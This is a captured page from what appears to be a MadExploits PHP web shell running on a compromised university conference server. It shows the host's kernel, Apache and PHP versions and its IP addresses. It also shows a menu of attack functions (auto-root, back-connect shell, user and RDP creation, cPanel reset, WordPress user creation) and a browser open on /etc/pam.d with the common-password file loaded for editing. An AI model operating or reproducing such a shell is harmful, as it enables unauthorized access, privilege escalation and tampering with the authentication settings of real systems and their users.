Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.226.34.148
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
pam.d /
[ HOME SHELL ]
Name
Size
Permission
Action
atd
250
B
-rw-r--r--
chfn
384
B
-rw-r--r--
chpasswd
92
B
-rw-r--r--
chsh
581
B
-rw-r--r--
common-account
1.18
KB
-rw-r--r--
common-auth
1.21
KB
-rw-r--r--
common-password
1.41
KB
-rw-r--r--
common-session
1.44
KB
-rw-r--r--
common-session-noninteractive
1.4
KB
-rw-r--r--
cron
606
B
-rw-r--r--
login
4.03
KB
-rw-r--r--
newusers
92
B
-rw-r--r--
other
520
B
-rw-r--r--
passwd
92
B
-rw-r--r--
polkit-1
270
B
-rw-r--r--
runuser
143
B
-rw-r--r--
runuser-l
138
B
-rw-r--r--
sshd
2.08
KB
-rw-r--r--
su
2.2
KB
-rw-r--r--
su-l
137
B
-rw-r--r--
sudo
239
B
-rw-r--r--
systemd-user
317
B
-rw-r--r--
vmtoolsd
119
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common-password
# # /etc/pam.d/common-password - password-related modules common to all services # # This file is included from other service-specific PAM config files, # and should contain a list of modules that define the services to be # used to change user passwords. The default is pam_unix. # Explanation of pam_unix options: # # The "sha512" option enables salted SHA512 passwords. Without this option, # the default is Unix crypt. Prior releases used the option "md5". # # The "obscure" option replaces the old `OBSCURE_CHECKS_ENAB' option in # login.defs. # # See the pam_unix manpage for other options. # As of pam 1.0.1-6, this file is managed by pam-auth-update by default. # To take advantage of this, it is recommended that you configure any # local modules either before or after the default block, and use # pam-auth-update to manage selection of other modules. See # pam-auth-update(8) for details. # here are the per-package modules (the "Primary" block) password [success=1 default=ignore] pam_unix.so obscure sha512 # here's the fallback if no module succeeds password requisite pam_deny.so # prime the stack with a positive return value if there isn't one already; # this avoids us returning an error just because nothing sets a success code # since the modules above will each just jump around password required pam_permit.so # and here are more per-package modules (the "Additional" block) # end of pam-auth-update config
Close